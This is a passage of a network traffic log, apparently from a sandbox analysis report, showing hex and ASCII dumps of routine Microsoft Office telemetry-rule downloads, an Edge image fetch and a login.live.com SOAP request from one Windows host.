G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> </S> <C T="

Session ID	Source IP	Source Port	Destination IP	Destination Port
133	192.168.2.5	49919	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-10 03:55:33 UTC	192	OUT	GET /rules/rule120681v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-10 03:55:33 UTC	470	IN	HTTP/1.1 200 OK Date: Sun, 10 Nov 2024 03:55:33 GMT Content-Type: text/xml Content-Length: 958 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:58 GMT ETag: "0x8DC582BA0A31B3B" x-ms-request-id: 12eeda2a-401e-00ac-598e-2d0a97000000 x-ms-version: 2018-03-28 x-azure-ref: 20241110T035533Z-15869dbbcc6hgzkhhC1DFWgtqs00000003c000000000kmm5 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-10 03:55:33 UTC	958	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 38 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 38 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 33 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120681" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120608" /> <R T="2" R="120680" /> <TH T="3"> <O T="AND"> <L> <O T="EQ"> <L>

Session ID	Source IP	Source Port	Destination IP	Destination Port
134	192.168.2.5	49918	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-10 03:55:33 UTC	192	OUT	GET /rules/rule120680v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-10 03:55:33 UTC	522	IN	HTTP/1.1 200 OK Date: Sun, 10 Nov 2024 03:55:33 GMT Content-Type: text/xml Content-Length: 1952 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT ETag: "0x8DC582B956B0F3D" x-ms-request-id: cfb0273a-f01e-001f-6a2d-325dc8000000 x-ms-version: 2018-03-28 x-azure-ref: 20241110T035533Z-15869dbbcc6pfq2ghC1DFWmp14000000059g00000000kfzg x-fd-int-roxy-purgeid: 0 X-Cache-Info: L2_T2 X-Cache: TCP_REMOTE_HIT Accept-Ranges: bytes
2024-11-10 03:55:33 UTC	1952	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 31 22 20 47 3d 22 7b 62 31 36 37 36 61 63 33 2d 37 66 65 65 2d 34 34 61 39 2d 39 61 30 65 2d 64 62 62 30 62 34 39 36 65 66 61 35 7d 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 33 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120680" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <SS T="1" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> <R T="2" R="120682" /> <F T="3"> <O T="LT"> <L>

Session ID	Source IP	Source Port	Destination IP	Destination Port
135	192.168.2.5	49917	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-10 03:55:33 UTC	192	OUT	GET /rules/rule120679v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-10 03:55:33 UTC	470	IN	HTTP/1.1 200 OK Date: Sun, 10 Nov 2024 03:55:33 GMT Content-Type: text/xml Content-Length: 174 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT ETag: "0x8DC582B91D80E15" x-ms-request-id: ed27c552-101e-007a-705f-2e047e000000 x-ms-version: 2018-03-28 x-azure-ref: 20241110T035533Z-15869dbbcc65c582hC1DFWgpv400000005w0000000008tyc x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-10 03:55:33 UTC	174	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 54 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 31 22 20 2f 3e 0d 0a 20 20 3c 2f 54 3e 0d 0a 3c 2f 52 3e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120679" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> </S> <T> <S T="1" /> </T></R>

Session ID	Source IP	Source Port	Destination IP	Destination Port
136	192.168.2.5	49922	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-10 03:55:33 UTC	193	OUT	GET /rules/rule120602v10s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-10 03:55:33 UTC	494	IN	HTTP/1.1 200 OK Date: Sun, 10 Nov 2024 03:55:33 GMT Content-Type: text/xml Content-Length: 2592 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT ETag: "0x8DC582BB5B890DB" x-ms-request-id: 289a03c5-801e-0015-6466-2ff97f000000 x-ms-version: 2018-03-28 x-azure-ref: 20241110T035533Z-15869dbbcc62nmdhhC1DFW2sxs00000002q0000000007mur x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-10 03:55:33 UTC	2592	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 32 22 20 56 3d 22 31 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 41 70 70 6c 69 63 61 74 69 6f 6e 41 6e 64 4c 61 6e 67 75 61 67 65 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120602" V="10" DC="SM" EN="Office.System.SystemHealthMetadataApplicationAndLanguage" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
137	192.168.2.5	49923	23.192.223.200	443	7512	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-10 03:55:33 UTC	506	OUT	GET /tenant/amp/entityid/BB18CMuA?w=168&h=168&q=60&m=6&f=jpg&u=t HTTP/1.1 Host: img-s-msn-com.akamaized.net Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Accept: / Origin: https://ntp.msn.com Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-10 03:55:33 UTC	551	IN	HTTP/1.1 200 OK Content-Type: image/jpeg Access-Control-Allow-Origin: * Content-Location: https://img.s-msn.com/tenant/amp/entityid/BB18CMuA?w=168&h=168&q=60&m=6&f=jpg&u=t Last-Modified: Sun, 03 Nov 2024 02:05:25 GMT X-Source-Length: 1437868 X-Datacenter: eastus X-ActivityId: 50a6369b-9161-4b0b-97cd-1ca7d7e66bd7 Timing-Allow-Origin: * X-Frame-Options: deny X-ResizerVersion: 1.0 Content-Length: 4096 Cache-Control: public, max-age=209419 Expires: Tue, 12 Nov 2024 14:05:52 GMT Date: Sun, 10 Nov 2024 03:55:33 GMT Connection: close
2024-11-10 03:55:33 UTC	4096	IN	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff c0 00 11 08 00 a8 00 a8 03 01 11 00 02 11 01 03 11 01 ff c4 01 a2 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08 23 42 b1 c1 15 52 d1 f0 24 33 62 72 82 09 0a 16 17 18 19 1a 25 26 27 28 29 2a 34 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e1 e2 e3 e4 e5 e6 e7 e8 e9 ea f1 f2 f3 f4 f5 f6 f7 f8 f9 fa 01 00 03 01 Data Ascii: JFIF``}!1AQa"q2#BR$3br%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz

Session ID	Source IP	Source Port	Destination IP	Destination Port
138	192.168.2.5	49925	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-10 03:55:33 UTC	193	OUT	GET /rules/rule224901v11s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-10 03:55:34 UTC	494	IN	HTTP/1.1 200 OK Date: Sun, 10 Nov 2024 03:55:34 GMT Content-Type: text/xml Content-Length: 2284 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:13 GMT ETag: "0x8DC582BCD58BEEE" x-ms-request-id: 37c49176-f01e-0003-705c-2e4453000000 x-ms-version: 2018-03-28 x-azure-ref: 20241110T035534Z-15869dbbcc6zbpm7hC1DFW75xg00000005fg000000001vap x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-10 03:55:34 UTC	2284	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 31 22 20 56 3d 22 31 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4c 69 63 65 6e 73 69 6e 67 2e 4f 66 66 69 63 65 43 6c 69 65 6e 74 4c 69 63 65 6e 73 69 6e 67 2e 44 6f 4c 69 63 65 6e 73 65 56 61 6c 69 64 61 74 69 6f 6e 22 20 41 54 54 3d 22 63 31 61 30 64 62 30 31 32 37 39 36 34 36 37 34 61 30 64 36 32 66 64 65 35 61 62 30 66 65 36 32 2d 36 65 63 34 61 63 34 35 2d 63 65 62 63 2d 34 66 38 30 2d 61 61 38 33 2d 62 36 62 39 64 33 61 38 36 65 64 37 2d 37 37 31 39 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 54 3d 22 55 70 6c 6f 61 64 2d 4d 65 64 69 75 6d 22 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224901" V="11" DC="SM" EN="Office.Licensing.OfficeClientLicensing.DoLicenseValidation" ATT="c1a0db0127964674a0d62fde5ab0fe62-6ec4ac45-cebc-4f80-aa83-b6b9d3a86ed7-7719" SP="CriticalCensus" T="Upload-Medium"

Session ID	Source IP	Source Port	Destination IP	Destination Port
139	192.168.2.5	49927	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-10 03:55:33 UTC	192	OUT	GET /rules/rule701200v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-10 03:55:34 UTC	494	IN	HTTP/1.1 200 OK Date: Sun, 10 Nov 2024 03:55:34 GMT Content-Type: text/xml Content-Length: 1356 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT ETag: "0x8DC582BDC681E17" x-ms-request-id: 891c653a-001e-0079-4649-3212e8000000 x-ms-version: 2018-03-28 x-azure-ref: 20241110T035534Z-15869dbbcc6b2ncxhC1DFWu4ss00000002q000000000cprx x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-10 03:55:34 UTC	1356	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 58 61 6d 6c 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 58 61 6d 6c 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
140	192.168.2.5	49924	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-10 03:55:33 UTC	192	OUT	GET /rules/rule120601v3s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-10 03:55:34 UTC	538	IN	HTTP/1.1 200 OK Date: Sun, 10 Nov 2024 03:55:34 GMT Content-Type: text/xml Content-Length: 3342 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:34 GMT ETag: "0x8DC582B927E47E9" x-ms-request-id: 659aa3e6-801e-008f-64d2-2c2c5d000000 x-ms-version: 2018-03-28 x-azure-ref: 20241110T035534Z-16547b76f7fmbrhqhC1DFWkds80000000c2000000000hz23 x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-10 03:55:34 UTC	3342	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 31 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 4f 53 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120601" V="3" DC="SM" EN="Office.System.SystemHealthMetadataOS" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC" xmlns=""> <RI

Session ID	Source IP	Source Port	Destination IP	Destination Port
141	192.168.2.5	49926	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-10 03:55:33 UTC	192	OUT	GET /rules/rule701201v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-10 03:55:34 UTC	538	IN	HTTP/1.1 200 OK Date: Sun, 10 Nov 2024 03:55:34 GMT Content-Type: text/xml Content-Length: 1393 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:51 GMT ETag: "0x8DC582BE3E55B6E" x-ms-request-id: 4e98fbea-b01e-0002-08d2-2c1b8f000000 x-ms-version: 2018-03-28 x-azure-ref: 20241110T035534Z-16547b76f7fr28cchC1DFWnuws0000000c4000000000mah6 x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-10 03:55:34 UTC	1393	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 58 61 6d 6c 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 58 61 6d 6c 22 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml"

Session ID	Source IP	Source Port	Destination IP	Destination Port
142	192.168.2.5	49928	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-10 03:55:34 UTC	192	OUT	GET /rules/rule700201v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-10 03:55:34 UTC	494	IN	HTTP/1.1 200 OK Date: Sun, 10 Nov 2024 03:55:34 GMT Content-Type: text/xml Content-Length: 1393 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:50 GMT ETag: "0x8DC582BE39DFC9B" x-ms-request-id: 197d537f-e01e-0085-240a-32c311000000 x-ms-version: 2018-03-28 x-azure-ref: 20241110T035534Z-15869dbbcc6vr5dxhC1DFWqn6400000006sg00000000kaqq x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-10 03:55:34 UTC	1393	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 57 6f 72 64 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 57 6f 72 64 22 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
143	192.168.2.5	49929	40.126.31.67	443

Timestamp	Bytes transferred	Direction	Data
2024-11-10 03:55:34 UTC	422	OUT	POST /RST2.srf HTTP/1.0 Connection: Keep-Alive Content-Type: application/soap+xml Accept: / User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68}) Content-Length: 3592 Host: login.live.com
2024-11-10 03:55:34 UTC	3592	OUT	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
2024-11-10 03:55:34 UTC	569	IN	HTTP/1.1 200 OK Cache-Control: no-store, no-cache Pragma: no-cache Content-Type: application/soap+xml; charset=utf-8 Expires: Sun, 10 Nov 2024 03:54:34 GMT P3P: CP="DSP CUR OTPi IND OTRi ONL FIN" Referrer-Policy: strict-origin-when-cross-origin x-ms-route-info: C519_BAY x-ms-request-id: b982ddc9-5528-4d7e-ac49-c57f9767f8dc PPServer: PPV: 30 H: PH1PEPF00018BDA V: 0 X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000 X-XSS-Protection: 1; mode=block Date: Sun, 10 Nov 2024 03:55:34 GMT Connection: close Content-Length: 11392
2024-11-10 03:55:34 UTC	11392	IN	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200

